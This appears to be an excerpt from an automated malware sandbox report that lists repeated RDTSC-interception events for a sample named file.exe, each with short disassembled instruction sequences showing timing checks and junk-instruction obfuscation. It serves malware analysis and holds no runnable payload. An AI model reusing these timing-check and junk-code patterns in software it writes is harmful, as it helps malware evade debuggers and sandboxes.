              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838B4F second address: 838B64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a jnl 00007F3D507EA966h 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 839C50 second address: 839C56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 839C56 second address: 839C6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F3D507EA966h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 839C6A second address: 839C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 839D29 second address: 839D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 839D2E second address: 839D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 839D34 second address: 839D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844F18 second address: 844F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3D50D0EC6Dh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844F2C second address: 844F30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CCFA4 second address: 7CCFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F3D50D0EC7Bh 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F3D50D0EC73h 0x00000012 popad 0x00000013 jbe 00007F3D50D0ECA5h 0x00000019 jmp 00007F3D50D0EC79h 0x0000001e pushad 0x0000001f jmp 00007F3D50D0EC76h 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CCFFF second address: 7CD005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84492F second address: 844933 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844A92 second address: 844AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3D507EA96Bh 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844AA4 second address: 844ADA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3D50D0EC8Ch 0x00000008 jmp 00007F3D50D0EC70h 0x0000000d jmp 00007F3D50D0EC76h 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F3D50D0EC66h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 849829 second address: 84982E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F62A second address: 84F659 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F3D50D0EC78h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F3D50D0EC71h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F659 second address: 84F663 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3D507EA96Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F663 second address: 84F68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3D50D0EC77h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3D50D0EC6Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3A47 second address: 7D3A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3A4E second address: 7D3A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D50D0EC6Eh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EAAB second address: 84EAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EAB0 second address: 84EAB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EAB5 second address: 84EACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D507EA96Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EACE second address: 84EAD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EAD2 second address: 84EAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3D507EA975h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F04C second address: 84F06C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F06C second address: 84F080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D507EA970h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F080 second address: 84F091 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 je 00007F3D50D0EC66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F091 second address: 84F0B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F3D507EA974h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jno 00007F3D507EA966h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F0B5 second address: 84F0B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F4A2 second address: 84F4A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F4A6 second address: 84F4B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F3D50D0EC68h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F4B8 second address: 84F4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8542C0 second address: 854318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Fh 0x00000007 js 00007F3D50D0EC68h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 push edx 0x00000013 jmp 00007F3D50D0EC6Bh 0x00000018 jmp 00007F3D50D0EC74h 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F3D50D0EC73h 0x00000025 jne 00007F3D50D0EC66h 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 854450 second address: 854459 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 854CB5 second address: 854CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 854CB9 second address: 854CC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858476 second address: 85847E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85847E second address: 858490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA96Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CDE3 second address: 85CE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007F3D50D0EC7Fh 0x0000000d jmp 00007F3D50D0EC79h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CE09 second address: 85CE1F instructions: 0x00000000 rdtsc 0x00000002 je 00007F3D507EA968h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F3D507EA972h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CE1F second address: 85CE29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3D50D0EC66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CE29 second address: 85CE3B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3D507EA96Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CE3B second address: 85CE3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CE3F second address: 85CE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DC0F8 second address: 7DC0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DC0FC second address: 7DC105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DC105 second address: 7DC10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 826A68 second address: 802317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push esi 0x00000007 jmp 00007F3D507EA972h 0x0000000c pop esi 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F3D507EA968h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 jc 00007F3D507EA976h 0x0000002e jmp 00007F3D507EA970h 0x00000033 call dword ptr [ebp+122D2706h] 0x00000039 push esi 0x0000003a push ebx 0x0000003b pushad 0x0000003c popad 0x0000003d pop ebx 0x0000003e pop esi 0x0000003f push eax 0x00000040 push edx 0x00000041 jnp 00007F3D507EA968h 0x00000047 push ecx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827230 second address: 827236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8273D3 second address: 8273E1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3D507EA966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8273E1 second address: 827400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3D50D0EC6Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827598 second address: 82759D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8278F9 second address: 827943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a movsx edx, di 0x0000000d push 0000001Eh 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F3D50D0EC68h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 mov dl, FBh 0x0000002b nop 0x0000002c pushad 0x0000002d pushad 0x0000002e jmp 00007F3D50D0EC73h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827943 second address: 827964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F3D507EA972h 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827594 second address: 827598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF24 second address: 85BF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D507EA974h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3D507EA976h 0x00000011 jp 00007F3D507EA966h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF5B second address: 85BF68 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF68 second address: 85BF77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D507EA96Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF77 second address: 85BF81 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3D50D0EC66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF81 second address: 85BF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3D507EA96Ch 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF95 second address: 85BF9F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3D50D0EC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF9F second address: 85BFB9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3D507EA96Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F3D507EA966h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BFB9 second address: 85BFBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C112 second address: 85C12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D507EA976h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C2B9 second address: 85C2BE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C474 second address: 85C478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C478 second address: 85C47C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C982 second address: 85C986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C986 second address: 85C98A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C98A second address: 85C990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862B58 second address: 862B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F3D50D0EC7Dh 0x0000000c jmp 00007F3D50D0EC77h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862B7B second address: 862B8B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3D507EA968h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861590 second address: 86159C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3D50D0EC66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86159C second address: 8615A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8615A1 second address: 8615D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jnc 00007F3D50D0EC66h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push esi 0x00000011 jmp 00007F3D50D0EC73h 0x00000016 jo 00007F3D50D0EC66h 0x0000001c pop esi 0x0000001d pop edx 0x0000001e pop eax 0x0000001f jo 00007F3D50D0EC84h 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8615D7 second address: 8615DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86170A second address: 861713 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861B7D second address: 861B87 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3D507EA966h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861CC2 second address: 861CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D50D0EC6Eh 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861CDE second address: 861CED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jp 00007F3D507EA966h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861FE8 second address: 861FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910A1C second address: 910A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D50D0EC78h 0x00000009 jmp 00007F3D50D0EC74h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91115B second address: 91117D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3D507EA966h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3D507EA974h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91129F second address: 9112A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9112A6 second address: 9112AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9112AC second address: 9112B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3D50D0EC66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 911422 second address: 91142E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007F3D507EA966h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91142E second address: 911441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F3D50D0EC66h 0x00000009 push esi 0x0000000a pop esi 0x0000000b js 00007F3D50D0EC66h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9115B2 second address: 9115DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA977h 0x00000007 jbe 00007F3D507EA966h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F3D507EA96Ah 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91173F second address: 911752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F3D50D0EC6Eh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 911752 second address: 91175B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91175B second address: 911763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 915A88 second address: 915A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 915A8D second address: 915A92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 915A92 second address: 915AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F3D507EA977h 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 915D6D second address: 915D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
